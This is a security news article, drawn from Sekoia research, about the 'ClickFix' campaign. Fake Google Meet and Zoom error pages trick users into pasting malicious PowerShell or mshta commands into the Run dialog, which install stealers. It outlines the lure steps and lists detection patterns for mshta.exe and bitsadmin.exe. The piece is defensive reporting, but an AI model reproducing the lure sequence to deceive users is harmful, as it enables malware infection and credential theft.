ClickFix Exploits GMeet & Zoom Pages to Deliver Sophisticated Malware

A new tactic, “ClickFix,” has emerged. It exploits fake Google Meet and Zoom pages to deliver sophisticated malware.

The Sekoia Threat Detection & Research (TDR) team monitors this social engineering strategy closely. It represents a significant evolution in how threat actors deceive users into compromising their systems.

The ClickFix strategy involves displaying deceptive error messages on web browsers, prompting users to execute malicious commands.

- Advertisement -

These commands, often delivered via PowerShell scripts, ultimately infect users’ systems with malware.

Build an in-house SOC or outsource SOC-as-a-Service -> Calculate Costs

The tactic is particularly concerning because it mimics legitimate video conferencing platforms, such as Google Meet and Zoom, widely used for business and personal communication.

How ClickFix Works

The infection process initiated by ClickFix is alarmingly straightforward. Users visiting the fake video conferencing pages are instructed to follow a series of seemingly innocuous steps:

1. Error Message Displayed: A fake error message appears, suggesting a problem with the microphone or headset.
2. User Action Required: Users are guided to press “Windows + R” to open the Run dialog box.
3. Malicious Command Execution: Users are instructed to paste and execute a malicious command copied from the page, usually involving PowerShell scripts.

This method tricks users into running commands that download and execute malware, such as the Amos Stealer for macOS or other payloads for Windows systems.

The technique leverages the appearance of legitimacy by having the malicious command run under Explorer.exe, reducing the chance of detection by security software.

There are several scenarios under which ClickFix can operate:

• macOS Target: Users are deceived into downloading a .dmg file that executes the malware directly.
• Windows Target: Two primary infection chains are used. One utilizes a malicious Mshta command, while the other employs PowerShell.

Each scenario exploits the user’s trust in familiar interfaces like Google Meet to initiate the malware delivery process.

Detecting ClickFix requires vigilance and understanding of typical behavioral patterns associated with these attacks. Key indicators include:

• Process Monitoring: Detecting unusual parent-child process relationships, such as mshta.exe or bitsadmin.exe being initiated by Explorer.exe.
• Network Activity: Monitoring for suspicious network requests made by processes like mshta.exe, which may use a default User-Agent string typical of Internet Explorer.

Organizations are advised to employ Endpoint Detection and Response (EDR) systems capable of identifying these patterns. Additionally, network logs from firewalls and proxies can provide valuable insights into potential compromises.

A significant aspect of ClickFix’s success lies in its use of legitimate Windows tools, a strategy known as “living off the land.”

By exploiting tools like bitsadmin.exe, attackers can bypass traditional security measures. This method emphasizes the need for organizations to maintain robust monitoring systems that can discern legitimate use from malicious activity.

The emergence of ClickFix highlights the evolving nature of cyber threats and the sophistication of social engineering tactics.

As threat actors continue to exploit trusted platforms like Google Meet and Zoom, users and organizations must remain vigilant.

Understanding the mechanics of these attacks and implementing comprehensive detection strategies can mitigate the risks posed by ClickFix and similar threats.

Run private, Real-time Malware Analysis in both Windows & Linux VMs. Get a 14-day free trial with ANY.RUN!